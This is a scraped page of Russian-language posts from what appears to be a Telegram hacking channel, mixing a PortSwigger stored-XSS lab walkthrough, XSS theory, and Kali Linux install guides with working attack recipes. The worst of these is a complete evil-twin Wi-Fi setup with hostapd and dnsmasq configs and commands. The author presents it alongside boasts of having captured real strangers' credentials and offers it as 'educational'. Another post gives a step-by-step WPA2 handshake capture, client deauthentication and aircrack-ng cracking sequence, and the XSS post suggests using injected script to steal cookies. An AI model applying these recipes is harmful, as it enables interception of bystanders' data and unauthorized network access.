2 958
مشترکین
اطلاعاتی وجود ندارد24 ساعت
-47 روز
-15630 روز
- مشترکین
- پوشش پست
- ER - نسبت تعامل
در حال بارگیری داده...
معدل نمو المشتركين
در حال بارگیری داده...
HELLO WORLD! Друзья, сегодня мы с вами проведем атаку на веб-сайт с помощью XSS (cross site scripting). Начнем с самого базового внедрения JavaScript кода. Настоятельно рекомендую не просто прочитать этот материал, а попробовать самим! Тренируемся сегодня на песочнице, так что справится каждый.
Сложность: 0,5/10
Итак, приступим!
1. Заходим на сайт https://portswigger.net и регистрируем аккаунт!
2. Далее переходим на эту страницу — https://portswigger.net/web-security/all-labs#cross-site-scripting и выбираем лабораторию с хранимой (stored) XSS
3. После того, как сайт был развернут, мы оказываемся на главной страничке какого-то блога
Поcкольку на этой странице (скрин №1) мы можем взаимодействовать только с кнопкой View post, мы нажимаем на неё и переходим на страницу с выбранным постом.
— Спускаясь в самый низ мы можем видеть поле для ввода комментария (скрин №2).
— Просмотрим код страницы, в котором увидим, что комментарий — простой текст, находящийся внутри атрибута параграфа (скрин №3)
— Теперь пробуем внедрить JavaScript код, который будет открывать уведомление при переходе на страницу. Вводим комментарий и далее добавляем Javascript код
<script>alert('xss');</script>
— Вводим все остальные данные (скрин №4) и оставляем наш отзыв
— Далее мы видим, что наш отзыв был успешно размещен на сайте (скрин №5)
— При переходе на предыдущую страницу вылезает наш XSS-alert (скрин №6)
— Спускаемся чуть ниже и видим, что наш комментарий остался, а вот JavaScript код отсутствует (скрин №7)
— Открываем код страницы и видим, что наш скрипт оказался рядом с нашим комментарием (скрин №8), а это значит, что теперь каждый посетитель сайта будет видеть алерт XSS при переходе на эту страницу.
Таким образом, при желании, мы можем внедрить JavaScript код, который будет собирать и отправлять куки в наши грязные ручки.
Друзья, если хотите более сложных атак, то как обычно жду вашей отдачи.🔥 24❤ 1👏 1🤯 1
333130
Я тут следом задумался... у нас же нет комментариев. Хотелось бы у вас узнать, нужны ли они? По мере возможности, думаю, смогу там помогать вам, если будут какие то сложности в процессе работы. Вы уже однажды собрали больше 100 реакций, так что давайте повторим.
🔥 100 реакций и я открываю комментарии
🔥 82👏 5👍 4🤯 2🎉 1
47500
Привет, друзья! У меня для вас отличная новость. Теперь каждые выходные будут выходить самые топовые материалы, в которых я буду делиться с вами мануалами, которые найти в открытом доступе не представляется возможным.
Сегодняшняя тема — XSS-атака на веб-сайт
Сложность: не лезь, оно тебя сожрет не для новичков (полезно для развития)
По традиции, старт с краткой информации. XSS (от англ. Cross-Site Scripting) — «межсайтовый скриптинг». Если говорить простым языком, то это тип атаки, при которой злоумышленник внедряет вредоносный код на страницу, который затем выполняется в браузере других пользователей. Например, это может происходить, когда владельцы сайтов оставляют возможность вводить текст на сайте напрямую в HTML без использования функций для преобразования специальных символов.
XSS атаки делятся на 3 типа:
—Рефлективные
—Хранимые
—На основе DOM (Document Object Model)
Разберем сначала первый вид атак — Рефлективные XSS атаки. Этот тип атаки реализуется тогда, когда пользовательский ввод возвращается веб-сайтом в виде сообщения об ошибке или, например, результатом поиска.
Пример вывода уязвимого для XSS веб-приложения:
<html>
<p>
<script>alert(1)</script>
</p>
</html>
Хранимые XSS-атаки. Тип атак схож с предыдущим, но поступает не из строки ввода, а непосредственно из хранилища.
Эта атака состоит из двух основных фаз:
1. Сохранение пэйлоада (полезная нагрузка) в хранилище данных в функции Store Handler (функции обработчика элемента управления)
2. Визуализация страницы в ViewHandler (обработчики, которые управляют представлениями, реализующие IView), с последующим добавлением пэйлоада к выходным данным.
Заключительный тип — XSS на основе DOM. DOM —каркас веб-страницы, позволяющий JavaScript изменять текст, стиль и структуру, делая страницу живой и интерактивной. Это тип атаки, происходящий исключительно на стороне клиента. Всё происходит за счет того, что веб-приложения перемещают логику к клиенту, а атаки происходят, когда пользователь напрямую манипулирует DOM.
Сегодня мы прошлись по теории, а завтра я выпущу практический материал на эту тему, так что жду ваши реакты 🔥.
Connection to Netscape closed...🔥 24👍 3
46240
Всем привет! Продолжаем вчерашнюю тему.
Установка Kali Linux для Virtual Box. Сложность: 0/10
— Скачиваем утилиту по ссылке.
— Переходим на официальный сайт kali.org, выбираем раздел Installer Images и ставим скачиваться файл оффлайн установщика.
— Заходим в Virtual box и нажимаем «создать», а далее все настройки копируйте со скринов:
1. (скрин №1)
2. Ставим 50% от объёма своей оперативной памяти (скрин №2)
3. (скрин №3) После создания нажимаем кнопку настроить и продолжаем все делать как на скринах
4. (скрин №4)
5. (скрин №5)
6. Выбираем скачанный ранее файл с установщиком (скрин №6)
7. Нажимаем ОК и запускаем тачанку
Далее переходим к настройщику и выбираем графу «Graphical install».
— После ознакомления с информацией о Kali установщик запросит имя хоста и домен (hostname и domain) для этой установки. Предоставьте соответствующую информацию для среды и продолжите её установку.
—Далее необходимо создать новую учетную запись пользователя, чтобы использовать ее вместо учетной записи root
— После установки пароля установщик запросит данные о часовом поясе, а затем сделает паузу на разбиении диска. Выбираем вариант «Guided – Use Entire Disk»
— Далее выбираем «All files in one partition»
— Подтверждаем все изменения, которые необходимо внести на компьютере и просто жмем финиш.
По завершении система предложит вам выбрать программное обеспечение, которое установит стандартную среду рабочего стола с необходимыми инструментами (скрин №7).
После завершения установки программного обеспечения система попросит установить GRUB:
— Выбираем Yes
— Выбираем наш единственный жесткий диск и запускаем установку GRUB на диск
В конце загрузки система автоматически перезагрузится и вам будет предложено ввести данные, что вы указывали на этапе настройки. Всё, мы в системе!
Connection to Netscape closed...
Сток Нетскейпа
1
🔥 10👍 2
474160
Друзья, пост по вашим заявкам! Начинаем.
Установка Kali Linux на Flash накопитель. Сложность: 0/10
1. Переходим на официальный сайт kali.org и выбираем раздел Live Boot (скрин)
2. Скачиваем последнюю актуальную версию «Kali 2024.2» (скрин)
3. Ставим скачиваться утилиту Rufus с сайта rufus.ie
4. Заходим в приложение Rufus и выбираем следующие параметры:
*Устройство — ваш usb накопитель
*Постоянный размер раздела — 10гб
Остальные значения не трогаем и нажимаем старт (скрин). Все данные с флешки будут удалены!
Как только образ будет, записан выполняем следующие действия:
1. Заходим в BIOS (гуглите клавиши для входа относительно вашего пк)
2. Переходим в раздел BOOT и находим раздел с приоритетом загрузки
3. Ставим нашу флешку на первое место в приоритете загрузки (скрин)
4. Переходим в раздел security и отключаем защиту (disabled). Гуглите для своей модели ПК! (скрин)
5. Выходим, сохранив изменения
6. Запускаем ПК
7. Выбираем пункт «Live system» — persistence, check kali.org.prst (скрин)
8. После входа в систему создаем папку на рабочем столе и перезапускаем систему. Если после перезагрузки все осталось на месте, значит всё ок.
Connection to Netscape closed...
Сток Нетскейпа
🔥 12❤ 2
542200
Hello World!Cегодня кратенький пост с историей из жизни. Пару лет назад, когда я только начинал свой путь в этой сфере, у меня не было никакого четкого плана, в какую сторону двигаться и чем заниматься. Постоянно кидало из стороны в сторону. Сначала я хотел заниматься работой с серверами и их уязвимостями, но когда углублялся, понимал, что пока еще не готов. Так было почти со всеми направлениями, пока я не решил, что тут надо двигаться только по строгому маршруту, выбирая направление, соответствующее моим знаниям и возможностям. Поэтому, чтобы не было мучительно трудно всем тем, кто только начинает свой путь, я буду публиковать все в формате RoadMap (дорожная карта). Соответственно, весь дальнейший материал будет идти по мере повышения сложности и вашего скилла :) Connection to Netscape closed...
🔥 20👍 4🎉 2
64610
Доброго дня! Ночью у меня возник вопрос. Нужен ли вам мануал по установке Kali Linux на флешку или виртуальную тачку?
Вдруг у кого то после крайних постов возникло желание вникнуть в работу с этой ОС, а с установкой возникли трудности.
Дайте огней 🔥, если надо такое залить.
🔥 67🤯 2
66320
Друзья, всем добрый вечер! Сегодня пост как раз связан с предыдущим. Увидел сегодня новость:
ВкусОчка Мак (не реклама!). Ох, как это было эмоционально... первый выход в "поля" и первый перехват траффика. Как итог: около 5 учетных записей со всеми данными и куча мыслей о дальнейших приключений в сфере вардрайвинга.
Думаю, вам интересно, как вообще такое можно реализовать. Я хочу вам сказать, что вы не зря подписались на мой канал — сейчас мы научимся с вами поднимать фэйковую точку доступа для перехвата данных пользователей. Стартуем, как обычно, с краткой инфы о методе атаки.
Fake Wi-Fi Hotspot. Тут все завязано на том, что любитель халявного интернета выберет нашу сеть в качестве метода доступа к всемирной паутине. Единственный минус этого метода — ожидание нашего "клиента". Тут может только повлиять название вашей сети, которое будет всем видом показывать, что это лучший вариант доступа к интернету.
Примеры: "FREE WIFI MC.DONALDS", "WIFI GUEST FREE", "TP-LINK 6563 FREE" — обычно люди, видя слово "бесплатно", выключают мозг и тыкают с уверенностью, что они переиграли этот мир.
Далее займемся самим процессом подъема ложной точки доступа по этапам:
—
«Задержан хакер, который похищал данные пассажиров самолета, используя поддельную Wi-Fi сеть»Сразу, как прочитал, вспомнил себя пару лет назад, сидящим в ресторане под названием
sudo apt-get update
(обновление списка пакетов)
— sudo apt-get install hostapd dnsmasq
(Dnsmasq — небольшой DNS / DHCP-сервер,)
— iwconfig
(проверка беспроводного соединения)
— ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
(переводим в режим мониторинга)
— mkdir / root / accesspoint
(создаем каталог в /root)
— cd/ root / accesspoint/
(переход в директорию)
— gedit hostapd.conf
(cоздаем файл конфигурации), пишем этот код в файл конфигурации:
interface=wlan0 driver=nl80211 ssid=Free_Wifi hw_mode=g channel=11 macaddr_acl=0 ignore_broadcast_ssid=0 auth_algs=1 wpa=2 wpa_passphrase=netscape123 wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP wpa_group_rekey=86400 ieee80211n=1 wme_enabled=1
— hostapd hostapd.conf
(запускаем точку доступа)
— gedit dnsmasq.conf
(Создаем файл конфигурации в корневом каталоге), пишем туда следующий код:
interface=wlan0 dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h dhcp-option=3,192.168.1.1 dhcp-option=6,192.168.1.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0 .0.1
— ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
( назначаем сетевой шлюз и маску интерфейсу)
— route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
( добавляем таблицу маршрутизации)
— dnsmasq -C dnsmasq.conf -d
( запусаем службу с файлом конфигурации)
— echo 1> / proc / sys / net / ipv4 / ip_forward
(включаем IP переадресации)
— PROFIT
С этого момента в вашем терминале будут показаны все действия жертв в нашей сети. Анализируем, используем информацию исключительно в учебных целях :). Традиционно, жду больше ваших реакций — они подбадривают продолжать делать интересные штуки для вас.
Connection to Netscape closed...🔥 34👍 8❤ 2🎉 1
772300
Доброго дня! Очередной пост на тему, которую вы сами выбрали — «Взлом беспроводных сетей». По классике, начнем с базовой информации — о типах шифрования. На данный момент существует несколько видов шифрования в беспроводных сетях:
— WEP (Wired Equivalent Privacy), метод аутентификации — WEP open и WEP shared
— WPA (Wi-Fi Protected Access), метод аутентификации — WPA-PSK и WPA-Enterprise
— WPA2, метод аутентификации — WPA2-Personal и WPA2-Enterprise
— WPA3, метод аутентификации — WPA3-Personal WPA3-Enterprise
Далее предлагаю рассмотреть вариант взлома на примере WPA2-PSK. Данный протокол проводит 4-стороннее рукопожатие (хэндшейк), которое используется для аутентификации и установления ключа для шифрования данных. Вектор атаки будет направлен на слабое место в процессе установления безопасного соединения между устройством и беспроводным маршрутизатором, а именно на захват хэндшейков.
Для совершения атаки нам нужен инструмент aircrack-ng. Также необходима сетевая карта с функцией мониторинга, если у вас эта функция отсутствует, то нужно будет приобрести сетевой адаптер. Я бы порекомендовал всем известный Wi-Fi адаптер от компании TP-Link (модель TL-WN722N v.1)
Пройдёмся по этапам взлома:
1. Переводим сетевую карту в режим мониторинга командой (скриншот):
airmon-ng start wlan0Если имеются процессы, мешающие работе, то команда:
kill (номер PID)
2. Запускаем сканирование командой (скриншот): wash –i wlan03. Запускаем перехват сетевого трафика для выбранной сети командой (скриншот):
airodump-ng –c 1 –bssid (тут вставляем BSSID вышей цели) –w capture wlan04.Отключаем клиента от сети командой (скриншот):
aireplay-ng -0 1 -a (BSSID цели) -v (Station цели) wlan0
5.Проверяем соответствие пароля захваченному рукопожатию командой (скриншот):
aircrack-ng –w /usr/share/wordlists/wifite.txt –b (BSSID цели) capture-10.cap
В примере мы используем встроенный в aircrack-ng словарь. Если найдено соответствие, вы увидите пароль.
Друзья, если вам нравится такой формат и если хотите большего, то продолжайте проявлять активность 🔥🔥 31👍 1❤ 1
701180
Всем салют! Сегодня хочу рассказать про новую игрушку, которую я на днях заказал и которую с нетерпением жду. Как придёт — более детально с вами всё разберём и потыкаем. А речь о популярном в пентестерских/хакерских кругах гаджете — Wi-Fi Pineapple (рассмотрим на примере базовой модели, которую я купил за 139 баксов).
Устройство представляет собой небольшую черную коробочку размером со смартфон, имеющую несколько небольших антенн. Оно полностью заточено под работу в "полях", благодаря своей компактности и непримечательному виду. Что касается функционала этого устройства, то список объёмен. Я выделю любимое:
—Сканирование и мониторинг сетей
—Захват рукопожатий (handshake)*
—Атаки типа «Человек посередине" (MITM)»**
—Создание фальшивых точек доступа.
Для первого запуска достаточно подключить девайс к домашней сети, выполнить установку ПО и инициировать настройку на веб-странице (~5мин на всё). После всех проделанных манипуляций устройство готово к работе.
Что касается простоты использования, то могу с уверенностью сказать, что нет никаких неудобств. Единственное, что отличает работу от других инструментов — это наличие кабеля с устройством в вашем рюкзаке.
*Handshake — это процесс установления связи сервера с клиентом, при котором у двух сторон генерируется общий ключ для шифрования и дешифрования данных.
**«Человек посередине» (MITM) — атака, при которой злоумышленник получает доступ к каналу связи между легитимными сторонами.
Connection to Netscape closed...root@netscape:~$ ./post-request.sh Публикация... Успешно [✓] Ожидание реакций (0/50) _
🔥 29🎉 6❤ 4🤯 2
79550
یک طرح متفاوت انتخاب کنید
طرح فعلی شما تنها برای 5 کانال تجزیه و تحلیل را مجاز می کند. برای بیشتر، لطفا یک طرح دیگر انتخاب کنید.